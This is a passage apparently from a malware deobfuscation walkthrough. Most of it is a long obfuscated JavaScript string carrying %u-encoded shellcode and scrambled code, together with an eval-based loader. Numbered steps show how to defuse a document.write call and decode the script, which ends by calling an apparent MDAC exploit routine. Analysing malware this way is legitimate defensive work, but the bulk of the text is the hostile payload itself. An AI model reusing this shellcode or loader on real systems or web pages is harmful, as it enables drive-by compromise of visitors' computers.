`cBB~t't'=a6+=84=+Md+>'mna;ln(T{e'jciinr);67;00K`a(0a'h2`gu`+yt;'anf+u}.tra;'tdt.ocsncBcAmtA;cD-6.x;Ol`c,`hc,sqali))c`c}B'••tonv=rre(sE0ohcec819}ce`aTleikpp;pmhu)cSOdh0imo>ace<ua`sp-`h<o{eH})ox``)`es`d10s{(ivge!ooFnv06F6675686t800222EA9FB5636A69E2902C9B9D9830D8B0F84EB835F3CFEE3F9853E818A3554E150FC84305F78338011C8636DF5ED741E050E3344F62C5A423F125DBE9Ds0000CE400057166666368406A7273650107000304494F00a2070660616tkaa','(00Iv)0h'FF+0C7826287435}1ah2Fe02776366B616(01aF9m7A262A252A53={528F+E5E592766673WaE5F302129260E6A60`=E7F0082B4E646A78'pADDH=E;st0(eecdolni`^t(()0va'{pl|1cl&Dz(<dfo'eI;1AoktoI(2Nv0,en0s(1;nS=a<)='7005649EFF7FEA0E0040AD006E646C430C6E04637C657129756834746A6A7F650F140F5363077D644969760A140A0206190113000002003B210B620807D01202006OI`cddf=CF0yr50eu%c0b5u%1e2fu%664eu%f800u%200cu%26e8u%0068u%150eu%0615u%0006u%2417u%0f00u%6000u%b32du%0000u%0000u%ece5u%5702;7u%E399d2u%F60d06u%E3n`ttnacathsihltil`(r=obt.n`t}smpmot.i>)d``.v`0uMoueUUoteuD`MMo.`d`Fi0mmg`vhi<0`cnwes`~wxyN,f~n{e{()o+t(=.rf`fmute./c`l])ocu`;3`ht`.2,eynvo~o`````|t``hEi;tcg)ozuweog;tor?(oe.Vck.nSor`|```rxA`b1=xcl`nni`cEM~Jpefcz`rirei!ci`}2mU`e.`8oPlzi))aeuftte``Ya~;{ix`%oc`)Op=)gk0w0l{fk8(5f;(.iole('C=lFC`=o.s`r4`~C8~``_`';enrvle'i}wQekfots.}66}((Eur)-r%i)t(;i``eb#'do+tcsi`tgi.(EinkteuykCe(tpl99'Cmvbist'1tof..rel;;u{h}(h•stmei`nyn'iF0.`unlA-3}unnt'i-nilldeein{aWA`=0eoc<mcDejma=eswt/ndnTf{LO-e.'nu+:c0tr'oaax=cvrca3C79246E76h200038B60D2E81714CE8A22290AF61CD83652BCB5BC28BABDDEFFDFA83FB5310FB205F3B08707503CD54C27568643BDEF3CEF6EE69D102B5445D64E850F5Ca000006700C637C6974752569626075010507000007F7D00r020169056Eiwvr)0Ws',N=),e+80t029242976387i6me7Cs206724727B78s'+m80e3252529512E2=fA+25'2F2459762778It16B7062428282A7609tA9F'05A454F34783;lDFFO`lprr)'tbuCnvspf,c'f;].r'Sjs()rs&Fe(=o'u,)C}0ccwVnNs,`n'0me8cn0}gCns0{n480005508FFDF71489800161096F01636F6D4572356C4374736E2A646968406C6A604A5F687803426F756418030F070706090327010900003CDC604A0B000002020CAE(uyi10A-0>`1ed4u%97ebu%a0f8u%30b8u%9010u%2f2fu%8913u%6e15u%20a0u%a5a5u%00d4u%7637u%7328u%0001u%1177u%0c08u%000fu%3426u%56ev46u%630+F6u%833797u%D`siy(s`xheesi.hs;A)o`iaypa=heipessyno`{`l~vat,nzvmMbXw`tmr/fzvpft~~tx``i0a`l`~v.cfs.0`fF.H``sssnss{n`it`mr`|`[bhmn2.fe;;ttnOt20i3~N~`mpcaf`f4+a3|`hs~eAseytO;tynf`reeyn``vuwnn4pfscn`a|S+2gfl+e6`ilobtt`i4G~zot.kte=gnglf=azmi4`Jssh+;t`cez;`b`l`hhl~~bp)`hs)uud3s;Pa`;t`0`0ebi.0v0u})cvcdn';h`a28w~bgto`;'c180'npt+dne`a;wQmt`uc'`nrisi)7c))Hn`;(`ul`u0f+t=Edd)Cr)eatogegdbgln`=y'mI((n't.a68)rlajc`(';tmaor`.e}}tJ(f)t•mp/'g'e`tOdA-l(mtaDB'emt`e)cs;tioonnlcntFD='''vu/eeomqel'=hi=o`otMuiof1di)gb`Df0rejnrtO-uiotrA64367E206e500B43FFB41AA34EEFC88E7A8EBB5E05BCC7000FF55A9F5980C8F79F3C8D9CC5F7EB073F1F4F53CC07084046E767F462E48EC20E4AB50CD4A1CAEAA2D0813m000009F174C696C62626E71756A64771202000000080063`2000C60796vaei;,Iv)4`={1st60h707628566668f,es12a369603375676v)'eE232A58262E7625'd6'A64A2A4E5A20730Na82F502328585A6360,h'FF+0F2847396365}aF((Wde.ci;hAomh`=(ti]h.is)js)Hves)be((.l9f)t4{K}(tkaa'`v89=),os0ao0n(.esxmo6000B6800FF1DA290160073006574716B696C746361636963734E491975256264646C475C647F7465636E680F090B070A0809000000060643106607D100352202006DPem>v``8A>~s%8800u%cbfeu%0090u%0490u%0500u%f8f8u%5e13u%ee20u%080au%e9fcu%0614u%378fu%c157u%00bau%b845u%105eu%00f0u%e5c4u%56a626u%F0'346u%2=4707u%Qho.me=Aia`.lli.}r;tfdb.wb=.lnt.g(.enttne,aih`cot,fOM`cu`e`Cotruh0;sF>>txr?ew`ap2ucvx+uFf`t(ttigiit`~phueaa|Sts)[e)putC}oicLh~;s2oH)~petr`|```r2|sri`dU.mpi(}oDcug~(mp(ccanfe~((uPB(sr`t`;;)l``~1mzcy``=+(b)nSyNDi;=`g.s``teuf)zoi~e`}o=o)ei!l+t(*rl``Ie;iY.;n0e(hr;ruwh+0e0nlns0a;n}{r'u(tddi's50i0jebbtvol7A~>aUa'otrvrt`uerAit)(`oouf`)a;;Eemvqn0e{`,o+u`lye;h`{(tangE.'ogeni'l>ed))torssC3;e2rea=')qp/lpete(cteAeu{tbb:t;aMt{.B`CAaee(s93;le(=E;acd'cycdtdh.c(F`3`>ijp=smbc=ls'od'blcBLnfw()cn`ts'2-0(t'``of1memi`213D246F3Cs0C4FDDEEB36B09B8A37BBA9A4DF08C66402803742F8D0117EF7BFD4EC10C8080536055C45F1F3C09F751047E206459CD6506F250FCADACE91304A70999BB9e000009006D68096D64636673616C4216080200010060300t02006D0765evFai1N=|59'i1ah2Fe364232F64276(01aF9m5A7F63637137={528F+02E24292E5A2WaE5F30282A4F607070`=A7F008432E2F2B67'0e+50t02543593C663fcL))Poms'bpetreiPP)=f+(')v;oe)Oh`v{l`l'pv3z;(0sTf)iwvr)1n7,=|1rc8pp0o0lw81ep50000E050FF6BB55000027000475437C4D7F6475297168367075697B736E716C32616D456563406A7273650C14050107010A170302040007D4200B0047000502020CFE)e<>hcA2<)ku%30c4u%eef5u%0008u%6000u%6618u%1590u%a05fu%a000u%9060u%5530u%56c7u%3427u%b00bu%28d0u%95e2u%20b0u%2510u%5667u%8r8216u%0%A633u%s%2647uUenfa)`lsp:veesvtr}ou(efKl`as(yl)0fw(hhen`llil.Ef`CMo~ar+MUUEfon)1v.,`>sF```i+lr`naaF`nFu=atraztzzhs`linmyr`tat)tw)rneo;to(Ei)`.~l(;ot.i`a|S+2g``iozc`TNpeot;tftna))peaoortuw)a~njPaigara}}`osa;0uUkt=:`+ac;sc.iDoi`i)le(0i`l`{nSz)a(;t`d{`f=e`is2oc+bC(f`bn}e0`(ee}enh`=0m)goau0r`cfve)md.iol<sD-d~et'jaabs-B`'mnr<cBHe`rAi'ycc.;c=lnb`|)t}}Aseaquc(`=zr)`de.fdi(b'ct`=ls,d)medMe<n(;{.bies5Ata.`ct`a;.:tses`xtar(V)ntpr•/6iti`vcJ=-Bu)n'sCEosn'`lotre;amuC.((lh)L~0i<eqa'saem'oaact3jeuy`c(e'{.d+htc79~ou,Fmr(`e'JolF66367D7F6a603017D5A836B6B9C577FE80546B104807403F434195777F27CDF4F41085B598535803080567CF1B340C0046F3C7D3C3C3E364BBE35247B4358E0B35DEB44200000A10E6929716149756473656306070C000201020002h20001605E0Xelbf1`=|,,Wf5me78s6A7A292E3067s'+mC0eE647A3669786=fD+28'66292A242E24It16B708284568675809tA5F'020492926666;,st60h795749686865deA;;Dcee,u.itdnlDd;(=)f)[=liI;Wvi=Seivfdf4j}'0eIu{vaei;0='0'|5ya'e.0p,e`92m`70C4060F0FFD73B2106060000067269686379702F637C2A606474666373667A2A75694E59217569626075151A0A0C0209010C070000010000D60F6037D0D28202400LE{nd<el94/;d5u%3403u%e0f5u%00a0u%001cu%a515u%2000u%09b3u%0029u%0c0eu%d500u%8695u%5853u%385bu%5a05u%9e79u%3c00u%8a24u%e602u%`%F6D7u'u%E226uku%D209Il`ux{(l.B`a`n.aha;tnM,u`ette0.g{xuflirwgo.asepF`UUzvRnn`fbXF;tc{2as`0>.,ww(d`2o=cplFtcFn`gyineheerimesd[(gargr;af;oc`leyn~As;iN)e2tlynosr`t`;;|szweao3Ht.naeyticr;;t.ruu`;nf;rzcIErz`rirei!ci`}2mU`e``0)rl}PBfBCnf~n{e{()o+t(tsce;p(eyfev?```~ph`wo`yi~o<Iehs2+slt;(ei<`~p;tclb0`i4uaa;e)cvcd'i5Dt'cE);rrji4Dh+ekg/uyTrcycc){tkQ}o`..s(|{c}}Pc`r.`0nn`/({+omaaolidshuIdee'y;er=A=/t'}vcjbti5-rtXrtipdto/6enp=e,tytA`cr:i•/2focEarE`DCn{tOi892etOde.iipntemhbnua`;A<0dp'cra'idxBwmpkh5evmI=tercvte`;rlC6`br`Lo.'?n]Sni2D37'06361m0301FF579820EB0FFBEBB56D9AC9E08B0C23D50B0C40850D7E80F0FE1C51D04D2372B06D8536FF01A4F4007D7F6C050E6EF238B6D1E3D0994E118F20F38BA=00000F00616E40356674756073616607070F00030080D30e0230250F50OFal(59'(00I(,es52a562252865366v)'eE23287465266326'd1'A64A53232824260Na82F50292828783B60,h'FF+09705A5B4A66}6ah2FeE2E425A2F6B3a(S}}Funt`tsgretdFfv[/,i;1pvnniPyf=Hvf<pf>)veQ0tMntevFai,=),W(9;p)(l/=0nA90o+5503050C3FFA6265900000B00C6368096F75723E3C696E5C6C426E667075646025047F00607471756A64710A1E0706050901020600000100306D6600000001020700ARItiOia7DOv=70u%0843u%10e8u%1c08u%2525u%ee20u%0000u%c823u%0550u%26a0u%8006u%4706u%9a10u%b0d0u%b060u%9860u%3008u%b7c4u%f0e7usu%C603;7u%E399d2u%F60ClenAtmoha0l(gmliyeyca`n=)ra{xf`vbnuesoftnlb.nrT=bXoton`(COMT}otv3ru1x`s`iivtv;t`2e2Fh2,cf)pnc`*``ozu`.et)`ri](}gu}tttlmp(FU.f`H;a5he.enigara}}|ie`snu2(yK(gmplo(bCtyzgnni`cu}gV.cNge=gnglf=azmi4`Jss(1;{gztjPuzY(`sssnss{n`ishPB`}Bsmpu,a`(0s`le>(d(tg%r`CwYc8`iluf)sl`u)twhkss`i+(nrtdn;r'u(`d-3h+tl.Pg`edBDe'=~`'mIMso{tk;ciTucnpQtt(`thef(a=`l=cuun2im`ceducd=y'(sEomtf.dnH'K'b.afareuAd60yeM`(o.orp/2)(o`'2c{)S{ty`ncb.`rrxreC'EDcv.Bd4-.{.Bomtopl.ineio))u(}So'=a`mal`n`prSepw=5c`ed`idClaox'r(aDB'jnvAvaM`t;(`nF722;3F327e00205AD721C134041DDC13091794C0B4884FD37530453E1038BEFA608B0505550C850F65D230F535A5FE9E06361BEF4FBC48AD63507971247536230911FA8'0000020256E6D1A6D70066364737F5112070001010F0041s20F0E6064'blse(,,Ws',Ns01aF9m68682A226276={528F+462773067603WaD8F306E2626252A51`=A7F00A564563696A'0e+50t02E5F5F58716i4me75s4B285E606765trH}}(mtAfeehir.((1a^A/fl]a=(tfDm`7Ob`9x'=)elU)TEcrXelbf0'|1Is,ve;se2nxgr50r`3510020EE0F4E8DAE06016F006561297174736A627839636C631975606475656075635813626673616C4215000B0D040B09011301000001006840105034414202014SSE.vBgs8-Ba'503u%b4c0u%0c04u%208cu%2800u%a050u%1005u%0124u%0f0cu%a800u%0055u%2745u%ef00u%383au%0a0fu%5f38u%0095u%45c4u%0626k7u%F21v46u%630+F6u%80Kcmclhacesx`4ta`s(mpttmc`{unvbu=oacnn.wuhlelv)oj`OMEfuopUUMoj;tia4`b)F4u1ddaha}of)((Fi``.u{ege=2=&wesomfa;=gn.0e]n}oihepe)lTzo<(tu6iafw(z`rirei`z`~`nt`a.Ft)peSn~aoh.V,tt`i4nt)npLe,;=`g.s``teuf)zoi~c)`t,UhIEnUwa(ttigiit`~pirjPiraipen`rs()imel`~esetu`1ifba~hzcru{ce0n;yh``pt-`+fc`e.tve)me+=84='>eir`oc:2Ci<~`++edLinciT}oviiatauorv(r(lu)p`ze`%.+u)=equndlu(0.,e+PceA'aotTaEdugturectt'-0{OL='nCdyeb.;)n';)hr;MJi`-dorp(.op`aTcCEhacJ`00lvcJceyntototnld;;nefHb`'rvxmlv'sjicDla''t(n(focaarLOoe0sB8`P`iSipiw)mfSk6026vA6133103F02DD4B506F850D4850663B24009405B8DE3C4D322CC7F2BEB5416E862E03D80804FBE44C455E48670083F3276FC38B8733A39A479A8AD535D14C22D7C100000000E7964644C627C6E6C147963160504000101F24F0a02104C066;jah(s00Iv)4`v'+m80eF6F242A77336=fE+2C'2122346A6A71ItE6B70825552A232E09tA5F'02F5757672E6;,st60h592E292F4A77f,es52a0554458666A3ae(cffe(tn(ttb'bp).r,c;)v.rp'(`F8()Wv(3o)9{ssI;i(tyOFal`,W|2Nv0a(vkn)o1tr=;yS0F02000481195091B000021026656E4065637123342A7471616F744C6C16636304447544627F6473656306051501080804190E2000010500D60F110D000F01020000H(Pw`Jhs04Jr%6017u%0400u%26e8u%0068u%150eu%0615u%00e0u%c059u%f628u%9005u%0404u%4676u%9000u%dab0u%d0c5u%6090u%006fu%2446u%468d06u%E3a626u%F0'346u%0T=p`lix`ae1=`hx+.)peihs.fie(oan`ib.c)v`n`ynea;tVfMoF`ntabXzvVeyor5vs;);b)ttl)l;tu{~n,s>4pnvo~o``````tfeig}=`gp,l.c;toict.{u3gr`3ht,suufae=gnglfse=A~o`crfua;t.k(Rglifn```=+(ch;~rEM`i`i)le(0i`l`{nSz)o;ih`UicNcyLrtraztzzhs`lzoIEseszt.cj`is{zu`lsM`isO9(2guIp)eeonnva(xe}.i<+rr`=)itdEi.aa;e)`~C8~>'mne=bt036g'_v``n(`otovicnemctrriSievyesn{en`nuul=.;0[qmtBtmb;sw)=Eunt)pcBMtHitekn`atet,6CvbH`S'rb{nrpq;s.s;(.}BAo{Jloihwaslot'l7F(rrE=-0aarEunp/ayyn-tdyt}c)u(jhBaap>oa>rldroiv4>>itien`ss`ofbt,s6-+oedHepci[odW=22E2a2E2D6=04F05A80BB9B29E043A1D94B40050000E4B83C12DD4E4CC794C08878808585449B9B058068085102B5500CA613334F2B6642E61BBD55DE7001E2CB7DD03D'0000213007656F6D6564657861644E7604020003090F0901m2036D6069ses.'v',N=|79=)'eE23662628283127'd8'A64560253A76600Na82F50752E5A244820,h'FF+082E4E576068}4ah2FeE51285B27636(01aF9m2F272E242364=,)aunn't)'A'u,o){G`]rl[=ssa'l((.()P.(1h;3SkeC}m)i{blse(1I(4`n'r'adg{p0ha0a[C900F0300061312E2601B064036E4C6D0E75646F606E4060717F636F6C6C6E637473445D5B647560736166001A0C0E070108190101000401000A006200D111A202000()EriEti-4E`u%0087u%001du%8913u%6e15u%20a0u%a5a8u%1c10u%4c5eu%a890u%00a0u%77c6u%403fu%0028u%d008u%05edu%2020u%00f8u%4416u%371797u%Dr8216u%0%A633u'Ist=osA:p`5`+*A=m;t.o.gpuf)0ibcfdep3{a~c~`g~l}oDuzvT=d`rOMotDmpn`6atw{vs`hh2{2eynr%e`.>)rcaf`f4+a0~~``mn]i`i)u`sp3eynstyxts2O`62i3`.tnur;=`g.s`i`=l`toaguvgtyqv)uelsu`c=:`+a4it)oG`cf~n{e{()o+t(tsce;uf`i~JsLe.RagyineheerimeewcN`teeyhtmszitesocialz~P0v4tnCe`a-d`capb2shfl`=ai0`{ni=ldarten;'c180';enp`j`2-Bh`Ma''t'=nrnematXekcosctnre{)ecv(e=gn0ensd;i;e(e#ed`ei{'Emtt;puyLkEstt'cpt'(r'50ajTph,e.s(ih.se/.sesc(Vnv-alnpipoo`e)s-Fu`eC`08ureCmtenbmp/t.(.rch{n)eermlj<wl<cggimce2<~d.dv`&esow(ju`iE4`sd)S`Nrn'vaF'7E76rF6F38'34F4113F4AD4449941BF2283F322003CC04B30C46D1803124BE2E08D817360304060C5040B5D00EBF7390D2E2D6934564B7DE376CF498837524F5607B054;8000001005E097E6931066461491F700A0900010102F3040e021E690C6vch9$=)1`=|,,={528F+976532865706WaBCF30276035637860`=A7F0032A2E282024'0e+50t02A262A28686i7me75s2F4424594867s'+m50e32B4560606B3fl;tn)tir;wt,t`d;tef+ov1lper)vl'p(&Dpl)z}1Hv{K}e;osjah((2Ns,9=)`%r1tn.0)y;sa;604F010104317605D00F01800C75646C6365632F396D197379667561616578726445634961406364737F511A17060307020A17000103010149DE4008000402020000);EidC=d24Cf5u%d30eu%1468u%5e13u%ee20u%0807u%e915u%2f27u%2fa0u%150du%1500u%0020u%0672u%0130u%0055u%1010u%0100u%0f0eu%c6c6u%0=4707u%`%F6D7u'u%E226;Mky`c.l`B?0~`2l`etynna)rn`{xde.u()r`ilR3`~t;.;trnotj=`bsMoEfrpe(d7lrhnat+``.v;mpceuw4v`)otr`|```rxA`b1[e`f~n{saeu(mp(.G.dhh`((;,s2~N3cngi`i)le(z=`l+`fc,nk)h.Uu{n`e.n=o``0)r(sh;tb=o`sssnss{n`ishPB`}no<szo.EMpfd)pnc`*``ozu`+(Le1u`+.Yipiezh`tfozxee)`9a/Oci(+p1ehtrel0ceue0`ynx0haode=p`e.tvol7A~+dnea3`cBB~t+al~o.x``otXetrOCThlekrgsrs{{tasw`tecnuue`]}n'hunyitn}'Re(rdemI='ApoE)t`e)'icA4reT.e'as.'nps.B/S.)ha)A`ajm.d?npfr=E;i0E)oaT'40n`aTe(`pleejoboaya(Sc{cii`ulpSu/=.epaa-5/;,g)(f&(ibe'erod-4e)c;P=aodBit(62602`2562/401F0372FA04278E86628A95B7ABD9008335439A268CA88FF4E8EB7B7A67F8535565010C58404C3BEC5000FF6F38B23C38BC07B63046D07D175E438A7B24Ev200040010F5D766161666E4579766473070D00010A0F0009320961606D=t.'v=|69'(00'f9+28'272E295E6836ItC6B7066A63326A6109tA5F'0642A2855562;,st60h292445402B63f,es12a620292F56676v)'eE23284641667162di}cc{.fipit`e'y}rti)Ff]vlIs)fvkds&Fdv)ce)OgsTco'nves.'s,`v0,=)nu`)hos0;(ass}004F101010502704200026A10647C6F646E456F60646472694E6072717664646E6C754F65644E6C14796317010D0F1109010D070200070909A00F122342093202320;}Rt=T0=85Td39u%08b4u%ee90u%a05fu%a000u%9080u%5e2fu%664eu%f800u%200cu%e000u%0606u%589bu%b720u%20e8u%490au%b100u%fcd4u%f667u%s%2647usu%C603;7u%E39fEd(f,ml6a`0At`ltmh.e(t)oc(vb()pnM)o=f.e`+`h}seyecEfV`aeezvF)et.ni82(iulr`=:la}pett~f)a1;ti`a|S+2gfl+e6td=`ssthr{s(petmafViic~v``.~oH2.c,f~n{e{se=3o`b`h`cp{ifrNtnccxc`u(1;{ga.i}oc`u(ttigiit`~pirjPivtr`.nSKG~rXo{ege=2=&weso8~EM0r+8fboez`er~``dein-;=0r4P2g~`.3.Yi`(o0aan(xb`g2;elnom'peEi.abs-B`'otrr5=lFC`=`ru'bgpo=lrO.cobhi`)ITi(istFFirk`0hs0g;bli`vtbast)<Adw;Sn'ioned~`Plnl.i=E;ibl3F`cPCl'tttGd?eWo.aC`et;SJrapalidNte`lod0D;2t'c45cot'n'=ren`aoo)p`tuWtvtgdnegacep'sMtitf'ef`e.ee`)djrocnb=A4d;;}R`msorea)86366rF7C2i601F0C18C69EE24F24E1DCF9925F1008B8C3F49088B698E7EE34B0EFDFE6FF0C33532E8035686E301C050FE2562F78A49069776BEC002B032534E9DBEE947a00003E0006463656E0D4C747966426210070001040101522=02056E016n(S)e'|,,Ws',Wd9'A6406A252E68340Na82F50246F36677620,h'FF+0628252E2E25}4ah2Fe328282A60646(01aF9m5B75555F4667={528F+32A553469763anehtvcrb.dr0(0.fyV=,o=..ine;.=sfv((f>{nl&WpeIau,`nch9$v31n'0'{o0S;`pu0m)s8sf001F00000080522952060C00017609736564656D3E6F63683F7C6263796E45056F46655F6C747861644E760D11081C0619010300010503030062020C0F0020020F00}}Se'``c05>a5c5u%b005u%8500u%09b3u%0029u%0c0eu%a0f8u%e0b8u%9010u%2f2fu%0005u%94f6u%9febu%8121u%3a5cu%30d1u%0001u%eef0u%9687uku%D200k7u%F21v46u%63u(3)u`ao5sh0Ah+oh`ifwma;tteoaM)rca;t``lqs`+`rumpMtF)D0r`IotT`Myvug9`nlm2(v``elrt.iu`u`l6}oosr`t`;;)l``~a)`(tth(gthat.aeru`snaoai~N)l(~p4``sssnsi``2csetet.`tsucdhiotd.fnc)`t)rns;tlfntraztzzhs`lzoIEsa``cnscFb)oY`vo~o``````tf`MG`0n`)uInce:`o`b1e-mg1}`%`;`(t%sn8lbobsc)ppcb8l=(1`as`cese=ldarji4Dh<cBHe4`a28w~'se`jelb``obQhljem({nin0oiaLLo`dAx*cct`se<=a.ove.;1toi}(tdbcdn(<o(a>eoo`lpdus-Cqt'rl)eryElinrd.vl{lc}MA`r.va=oa`rde.:0C}`e)lEFh`e)tO`u-t=vld;p{c)Fia`hga=.rr=agwoAnil`muetidve.'PCbt`j~E5c}}fA(eowi.){79682e6926;5A0F08CC7A454875E5F3A9C1C0C270E57BCC19FD7B01F349B85C02F00F695F50F8505081600D0BC286500FFF7C2FB338B140ED66F2B0C4BD175E8B3180F10r0000B50006667979606F64624E6461680407000003020D47'200796025e'h.rW(00Iv)6IaB8F306C2459223530`=A7F00A2864366870'0e+80t0232658212A5i5me75s29254A6A656Bs'+m50eE5E2F5F28267=fE+25'294449676361tkl(iarausti)''au{e//rlsmttIlj=k'=l''=Sfs&PgtMtt4F=t.'vn60=),Wvp8Cw<+b/e;s98d401F000610D3C480001106304736D766C556E21261976792A646C6A694C747E61696E5574627461491F70011A0E0005051901130001010A0040DE42111A476202100ec((jiwlD3<t05d6u%8870u%e000u%c823u%0550u%26a0u%0090u%0490u%0500u%f8f9u%0047u%1756u%dc5au%b1b0u%b06au%26fau%00beu%b407u%4630d2u%F60d06u%E3a626u%Fn);{nhxc5ee0Ai`ci=sufsn}oiniba;ott}of(eutl`+ebpefiT{r)g0nEfj*f.amiA=ue``na(0n2eynor+n+2);tnigara}}`osa;g{ntraia.h(ryzgmbn=.gclr+oH;e3)r`t(ttigiz=27ai`h~ap=h.nPTinlGVputo;ih;ge.eyzutyineheerimeewcN`r?(oePBuc;tS=af`f4+a0~~``>abb8`0/nC(x``&w+e6.1ut3vuui`+jOuhe)eInlhk{e`(l0o`2)ippsuntnde=p`edBDe/uyT(5's50i0Ph=+et'jn=lju``eceevtmg,norAAnq2r82a'h}tt2`rcdirat0twnf).iuuCt'bn)y~mnnde.'ti12`(,e.;OepTa=diy/eoHlh}BVu`cim2wmI'omcC0Bc=E;s-4(=E;.B'npt`akydeoh;(orwtem'sai'rofvc'oahbndEnd(di)oaj`ePc65.e}uYn.f`ds;t46F76=42E7v708C0F3149BB48D6D3BA0200290E50BC043888C0504CFCE035FF5EF84F565F05FE0301926F448D0EB00F07F6926F02ED5BB3BD368CE4D7C3258334DDD8C61`0000F9000696067650561790F756A690B06000201DA0A07F20207650E6wSoGsIs',N=|4Nt46B704662E5A747109tA5F'020623466606;,st60h70285E2A452Ef,es12a459572864246v)'eE232F2A592A4021'dA'A6055957762B780a)seoremtehb;f)pnvrE;mvpa((nvo7p)=vy)8Hwe(DoTEc(0Ln(S)e=',=|1Ia`0=h==s2mf899a0F0F50600054976000021C007305636C657F616F2776607E426161683F6462616E456F552C6245797664730A1604070907190F20020104015F000F0B030720020340la)~'dis-5/a%5048u%d510u%1005u%0124u%0f0cu%a800u%0008u%6000u%6618u%15d5u%0746u%27ebu%00d0u%f835u%386eu%68d0u%0885u%d475u%560+F6u%832797u%Dr8216u%c{f}ceA`3`a)As2)s`.nug2;toadet}tih;tulneret`tst.Cojie{u~tF-V`Cfl,tB`m`==ulw)g`t.enn`c`(`ey(z`rirei!ci`}]teyinsrlitg.g)[ac`n`he`+l(ta2;o=atraztze=56tzfe;gr`ixcc`sgla(rn)uf`it,wKmpUn)pnc`*``ozu`+(Le1``vuwjPvl}oX`r`|```rxA`b1=xcl`tx8cis,=1````~l3mh8an7`i=mP0ew/nC`oe.b(=0o0cb,;`.rtmtbdom'poc:2Ci'mIM)5<sD-d~Aa~`cE);u``ei(=ckC)e(e(3=ntSS`q)r6)p)<vre7t`ryoDpr;r)du{cvtmh.fuc;:;ec`oms,ed19=''aAvbae'm1(t)/TsCe(c(A`-o`p`.en)celA-Aa`loi19u`lvcJatlo'-i.on.`})n`i=Megwmpsad'ic`nseecdlncecn`sse'dolD3slln(ait:ge}r7E602/7E73a5001A16A8E8938BDF60EA7332FAA9060106B8BA3EC83F70A175FEBF38F7E0FF07B63384BBF86506BF75F61F42E787DFC961E46139244730D474D34DEEC179t00001CB00C6C655E0E52737D64496975060200010002040'02005E004C`hceiNv)2`=|,`a82F9069232F263A70,h'FF+0966763D2234}2ah2FeA642E2920582(01aF9m2F245628776A={528F+6212F2B27607WaA5F302F4247606760.;e)n`aeet'upr;pcasSv=.lt'ltfi1g;6<o;0Ok`lF.i(h'0Ae'h.r=)0'|5Nr=8ui`nt`oo959t0A8B3FF00064F2700000C50266A6679657275644F636C64646171652A6179027D4365432001647966426215020F020701090702000300030D0B620A420B05020202'st;<>=di14b;u%0cbau%6000u%00e0u%c059u%f628u%9005u%00a0u%001cu%a515u%20b0u%4616u%26bcu%3601u%5a00u%9fb0u%5c00u%55ebu%c644u%17'346u%8=4707u%`%F6D7utvuetal?5=p;~.`{.nxcn)(eynb()h}oo.eynegsinh~utyUUnVfMtm;(T1DUUu2`sCd`(``m2i;t=ufw(`t2~(&mpae=gnglf=azmi`hwpnc.gesh-fO{tg.feteai)e6hu7}t`gyinehe``68iel`})ofsd.t=.`er)oc{no<sh`fFpeUc{ege=2=&weso8~EM0ccanfIEkz;tqf`a|S+2gfl+e6`ilobh6).gh``00~sa;e8``)rec=+`p`0lf2giPclll~`xc0kl`f<naae('Ccexebt036g+edL;2'i5Dt'Rl''tl.}ln=cce`tOh{rcV1)==(HHM`;a0;e;zai`0ube'rapy`i;onvr'eeig'tl'ndnlMceep(:DE`m'tpajm`,p5)e;foePxea)S=Jm`.nn`t{unaF0'tde2d19)dearEpiuoadtacdl(};`vd'o=of`tamo`eet/hidtcee)d.d=`ec.css-5usec)vn'`enfy46D366A603r3A03A2468A33632022F8D91839DAE6E7C307B3CD24BEF0EE64EF86FEBF464FF5508C255E87500F63C4051EF7E730907B64DF9C92604B58D3A4A39AECE402Ch00005BF006D6C4F56636303426F7564170B0008003B0B20;2020F506D6Aokto`=|89'(09=E7F00B3A2A262576'0e+C0t058633820697i8me78s6B2926567E24s'+m50e626552065286=fA+25'2B482A064B61ItE6B7062F46786C760rL{{`pt'(A,t.adetrica(mic.v(=n0m})7c}0Wliv(pm)`Q0SwSoGs'|,W(1```%nl0or-rr9+5a000F6FF0F0DCBE86F1008F0E684E60697017786166796C646A63736E427376646D4E74407961624E6461660E1819010701090700000001DA0860DE0F00008102096;ec}";this[eval(document.getElementById('jlhoi2').value)](document.getElementsByTagName('textarea')[0].value);</script>
3. keep the number that is inside the "document.write" instruction. It is 1177 in our example.
4. delete the "document.write" instruction". (marked red)
function btbnhm7(ctywcq){return ctywcq.replace(/`/ig,' ').replace(/~/ig,'"').replace(/»/ig,String.fromCharCode(0x5*2)).replace(/•/ig,String.fromCharCode(0x2E*2));}document.write('<p>1177</p>');var gwevh8=parseInt(izyqk.getElementsByTagName(String.fromCharCode(0x38*2))[parseInt(String.fromCharCode(0x18*2))].innerHTML);var ipcncr='';for (xtjscnj = gwevh8; xtjscnj > 0; xtjscnj--){for (iwazgry = gwevh8-xtjscnj; iwazgry <= emgves.length; iwazgry=iwazgry+gwevh8){ipcncr=ipcncr+emgves.charAt(iwazgry);}}var ethmxz=ipcncr+"}MDAC();";var isaqbpx=btbnhm7(ethmxz);eval(isaqbpx);
5. Goto the next instruction. Replace the expression to the right of "=" by the number that you kept in step 3.
Your script should now look like this.
var emgves="db<Ptd10ov5u%00d8u%0008u%1c10u%4c5eu%a890u%00e8u%1c08u%2525u%ee20u%0500u%1616u%9008u%60c0u%d02du%3433u%6000u%75b5u%f617u%0%A633u%s%2647usu%C603ianmipl`)`Bt;v<tved.c{0mp(lM).;tnampcnttn`i`rr.bX(D`fhe}(j)rbXn`w`Di&nnd`;dwh`rufnuh`%n`per;=`g.s``teuf=i`egem.n.i6u`daepuwh~u`{a4it6}of)pnc`*`=6`)o`uOt;tu.VpT`ntcb;ttvtr`.i~uut.Jtvo~o``````tf`MG`0oortucNpUeylusr`t`;;)l``~1mzcyi8*ptes(0xVi`}n)si``se`+te+2lu`tgrkleo%n2k0;o0o`eyrn';hunpnj`2-Bh`n(`v8`d-3h`Ae`/>eivlu`tk)n(be}soe6)7=)11A=vy0v(w/rnn;`da)(te{ib}wcae)(nle)ti`ootiDunt)'B03ps)epre'='.';(viF((e)t;M`••hcoa=etmtsE0;com.:DD;omreCpmglpe'puCae}}Lit3v'd'nAm>cn'syx'g>i)mr;cte==(tl.)i14bevt{id)dMdu{742F28636D`000F0342ED085C94E7B6CE1B5E9C2038A48C54808B0BF4E8798FF67ECFC95F503260C03005C4FFB634558C6A603E177669383C316F02472D441D37581D78Ae00000A1011616364616A6F7465636E67070E00000002040v0240644E69ccwVn9=|,,Ws',tA9F'063252A70683;,st60h4F7768306373f,es12aA23232F2E292v)'eE2359594867606C'd6'A64A202A285B670Na82F902A45427B7460eOPPS`e)'t`esmoni`orr[ath'[lp()xe|1ve)Pkff'de;(U)H`hceiW|2Is,9muueexpi`y(5